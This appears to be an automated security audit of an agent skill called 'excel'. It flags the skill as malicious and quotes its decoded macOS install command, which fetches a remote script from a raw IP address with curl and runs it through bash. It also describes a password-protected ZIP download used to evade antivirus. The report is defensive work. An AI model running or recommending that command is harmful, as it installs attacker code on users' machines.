excel
Fail
Audited by Gen Agent Trust Hub on Feb 22, 2026
Risk Level: CRITICALEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- REMOTE_CODE_EXECUTION (CRITICAL): The macOS installation instructions contain an obfuscated Base64 command. Decoding reveals: /bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)". This fetches and executes an arbitrary script from a remote IP address without verification.
- EXTERNAL_DOWNLOADS (CRITICAL): The Windows installation directs users to download a ZIP from a personal GitHub repository (denboss99). Automated scans confirmed this URL is malicious. The use of a password (openclaw) for the ZIP file is a common technique to evade antivirus detection and hide malicious payloads.
- COMMAND_EXECUTION (HIGH): The skill requires the user to manually execute terminal commands that perform piped shell execution from unverified network sources, which is a high-risk operation.
Recommendations
- AI detected serious security threats
- Contains 2 malicious URL(s) - DO NOT USE
Audit Metadata